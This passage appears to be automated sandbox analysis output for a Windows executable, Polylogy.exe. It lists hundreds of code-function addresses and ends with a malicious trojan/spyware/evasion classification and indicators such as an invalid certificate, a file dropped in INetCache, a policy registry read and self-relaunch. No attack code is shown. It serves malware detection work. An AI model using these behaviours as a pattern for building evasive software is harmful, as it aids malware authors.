            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D96A184_2_38D96A18
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D900124_2_38D90012
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D946144_2_38D94614
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D930084_2_38D93008
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D96A074_2_38D96A07
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9BC384_2_38D9BC38
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D960304_2_38D96030
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9BC294_2_38D9BC29
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9DC284_2_38D9DC28
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D946204_2_38D94620
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D960224_2_38D96022
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9E9D84_2_38D9E9D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D95BD84_2_38D95BD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9C9D84_2_38D9C9D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9E9C84_2_38D9E9C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D95BCA4_2_38D95BCA
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D981C04_2_38D981C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D92FF94_2_38D92FF9
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D915F84_2_38D915F8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9C9E84_2_38D9C9E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D915E84_2_38D915E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9D7984_2_38D9D798
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9B7984_2_38D9B798
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D911904_2_38D91190
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9F7884_2_38D9F788
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D957804_2_38D95780
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9D7874_2_38D9D787
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D92BB04_2_38D92BB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9B7A84_2_38D9B7A8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D98FA14_2_38D98FA1
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D911A04_2_38D911A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D92BA04_2_38D92BA0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D927584_2_38D92758
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9C5584_2_38D9C558
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D927494_2_38D92749
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D90D484_2_38D90D48
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9E5484_2_38D9E548
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9C5484_2_38D9C548
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9F7784_2_38D9F778
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D957704_2_38D95770
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D97B694_2_38D97B69
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9B3184_2_38D9B318
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D977104_2_38D97710
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9D3084_2_38D9D308
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D923004_2_38D92300
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9B3074_2_38D9B307
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9A9384_2_38D9A938
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9E5384_2_38D9E538
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D953284_2_38D95328
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D9A9284_2_38D9A928
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38D977204_2_38D97720
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E05FD84_2_38E05FD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E066784_2_38E06678
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0CAE04_2_38E0CAE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E00DE04_2_38E00DE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E087E04_2_38E087E0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E03FE84_2_38E03FE8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0F5E84_2_38E0F5E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E01FE84_2_38E01FE8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0B2E84_2_38E0B2E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E00DF04_2_38E00DF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E087F04_2_38E087F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0DDF04_2_38E0DDF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E048F74_2_38E048F7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E01FF84_2_38E01FF8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0B2F84_2_38E0B2F8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E06FFB4_2_38E06FFB
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E065FC4_2_38E065FC
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E016FF4_2_38E016FF
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E09AFF4_2_38E09AFF
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0B7C04_2_38E0B7C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E004C04_2_38E004C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E05FC74_2_38E05FC7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E036C84_2_38E036C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0E2C84_2_38E0E2C8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E09FC84_2_38E09FC8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E004D04_2_38E004D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E074D04_2_38E074D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0CAD14_2_38E0CAD1
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0F5D74_2_38E0F5D7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E09FD84_2_38E09FD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E03FD84_2_38E03FD8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E01BA04_2_38E01BA0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0A4A04_2_38E0A4A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0FAA04_2_38E0FAA0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0CFA64_2_38E0CFA6
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E02DA84_2_38E02DA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0CFA84_2_38E0CFA8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E056A84_2_38E056A8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E08CA94_2_38E08CA9
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0B7AF4_2_38E0B7AF
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0FAB04_2_38E0FAB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E036B74_2_38E036B7
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E056B84_2_38E056B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E08CB84_2_38E08CB8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0E2B84_2_38E0E2B8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E074BF4_2_38E074BF
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E012804_2_38E01280
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E091804_2_38E09180
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E024884_2_38E02488
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0BC884_2_38E0BC88
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E079884_2_38E07988
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E04D894_2_38E04D89
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0A48F4_2_38E0A48F
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0E7904_2_38E0E790
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E01B914_2_38E01B91
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E04D984_2_38E04D98
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E079984_2_38E07998
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E02D9C4_2_38E02D9C
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E009604_2_38E00960
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E07E604_2_38E07E60
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0D4604_2_38E0D460
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0A9684_2_38E0A968
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E044684_2_38E04468
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0D4704_2_38E0D470
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E012704_2_38E01270
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E091714_2_38E09171
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E066754_2_38E06675
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E044784_2_38E04478
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E024784_2_38E02478
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0BC784_2_38E0BC78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0E77F4_2_38E0E77F
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E000404_2_38E00040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E06B404_2_38E06B40
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0C1444_2_38E0C144
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E05B484_2_38E05B48
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E096484_2_38E09648
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E03B494_2_38E03B49
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0EC494_2_38E0EC49
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0C1504_2_38E0C150
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E009504_2_38E00950
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E07E504_2_38E07E50
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E03B584_2_38E03B58
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0EC584_2_38E0EC58
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0A9584_2_38E0A958
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0F1204_2_38E0F120
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E000214_2_38E00021
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0D9274_2_38E0D927
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E052284_2_38E05228
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E083284_2_38E08328
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0322B4_2_38E0322B
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0AE304_2_38E0AE30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E06B304_2_38E06B30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E096374_2_38E09637
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E032384_2_38E03238
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0D9384_2_38E0D938
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E05B394_2_38E05B39
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0DE004_2_38E0DE00
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E029074_2_38E02907
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E049084_2_38E04908
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E070084_2_38E07008
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0C6084_2_38E0C608
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0660B4_2_38E0660B
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E017104_2_38E01710
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E09B104_2_38E09B10
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E000114_2_38E00011
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0F1114_2_38E0F111
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E029184_2_38E02918
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0C6184_2_38E0C618
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E052194_2_38E05219
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E083194_2_38E08319
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E0AE1F4_2_38E0AE1F
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E2DA304_2_38E2DA30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E273E04_2_38E273E0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E2F1684_2_38E2F168
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E25AE04_2_38E25AE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E228E04_2_38E228E0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E212F04_2_38E212F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E244F04_2_38E244F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E270C04_2_38E270C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E23EC04_2_38E23EC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E20CC04_2_38E20CC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E254A04_2_38E254A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E222A04_2_38E222A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E26A804_2_38E26A80
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E238804_2_38E23880
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E206804_2_38E20680
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E24E604_2_38E24E60
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E21C604_2_38E21C60
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E206704_2_38E20670
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E26A704_2_38E26A70
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E264404_2_38E26440
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E232404_2_38E23240
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E200404_2_38E20040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E248204_2_38E24820
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E216204_2_38E21620
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E25E004_2_38E25E00
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E22C004_2_38E22C00
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E241E04_2_38E241E0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E20FE04_2_38E20FE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E257C04_2_38E257C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E225C04_2_38E225C0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E23BA04_2_38E23BA0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E209A04_2_38E209A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E26DA04_2_38E26DA0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E251804_2_38E25180
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E21F804_2_38E21F80
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E26D904_2_38E26D90
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E235604_2_38E23560
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E203604_2_38E20360
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E267604_2_38E26760
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E24B404_2_38E24B40
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E219404_2_38E21940
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E203584_2_38E20358
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E261204_2_38E26120
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E22F204_2_38E22F20
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E245004_2_38E24500
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E213004_2_38E21300
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E31CF04_2_38E31CF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E384704_2_38E38470
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3FB304_2_38E3FB30
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E31CE04_2_38E31CE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3F4F04_2_38E3F4F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E390F04_2_38E390F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3C2F04_2_38E3C2F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E304F94_2_38E304F9
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3D8D04_2_38E3D8D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3A6D04_2_38E3A6D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3BCB04_2_38E3BCB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E38AB04_2_38E38AB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3EEB04_2_38E3EEB0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E30E894_2_38E30E89
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3A0904_2_38E3A090
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3D2904_2_38E3D290
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E30E984_2_38E30E98
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3E8704_2_38E3E870
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3B6704_2_38E3B670
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3CC414_2_38E3CC41
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E300404_2_38E30040
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E39A504_2_38E39A50
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3CC504_2_38E3CC50
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E318284_2_38E31828
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3B0304_2_38E3B030
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3E2304_2_38E3E230
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E300114_2_38E30011
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3C6104_2_38E3C610
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E394104_2_38E39410
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3F8104_2_38E3F810
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E318174_2_38E31817
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3DBF04_2_38E3DBF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3A9F04_2_38E3A9F0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3F1D04_2_38E3F1D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E309D04_2_38E309D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E38DD04_2_38E38DD0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3BFD04_2_38E3BFD0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3D5B04_2_38E3D5B0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3A3B04_2_38E3A3B0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E309BF4_2_38E309BF
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3B9904_2_38E3B990
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E387904_2_38E38790
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3EB904_2_38E3EB90
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E313604_2_38E31360
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E333604_2_38E33360
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E39D704_2_38E39D70
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3CF704_2_38E3CF70
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E313514_2_38E31351
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3E5504_2_38E3E550
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3B3504_2_38E3B350
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3C9304_2_38E3C930
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E397304_2_38E39730
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E305084_2_38E30508
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3AD104_2_38E3AD10
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38E3DF104_2_38E3DF10
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F939984_2_38F93998
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F91DF84_2_38F91DF8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F932B04_2_38F932B0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F916D84_2_38F916D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F94A864_2_38F94A86
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F92BC84_2_38F92BC8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F90FF04_2_38F90FF0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F924E04_2_38F924E0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F939894_2_38F93989
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F91DE84_2_38F91DE8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F932A04_2_38F932A0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F916D24_2_38F916D2
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F90BC04_2_38F90BC0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F92BB94_2_38F92BB9
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F90B324_2_38F90B32
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F90C784_2_38F90C78
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F90FE04_2_38F90FE0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F901E84_2_38F901E8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F901D84_2_38F901D8
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_38F924D04_2_38F924D0
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_396249584_2_39624958
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_39621B144_2_39621B14
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 4_2_3962B4504_2_3962B450
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: String function: 00402AD0 appears 51 times
            Source: Polylogy.exeStatic PE information: invalid certificate
            Source: Polylogy.exe, 00000004.00000002.4536512905.00000000359B7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Polylogy.exe
            Source: Polylogy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@5/5
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
            Source: C:\Users\user\Desktop\Polylogy.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Polylogy.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierministerJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Polylogy.exeFile created: C:\Users\user\AppData\Local\Temp\nsw2DD8.tmpJump to behavior
            Source: Polylogy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Polylogy.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Polylogy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Polylogy.exeVirustotal: Detection: 26%
            Source: C:\Users\user\Desktop\Polylogy.exeFile read: C:\Users\user\Desktop\Polylogy.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"
            Source: C:\Users\user\Desktop\Polylogy.exeProcess created: C:\Users\user\Desktop\Polylogy.exe "C:\Users\user\Desktop\Polylogy.exe"
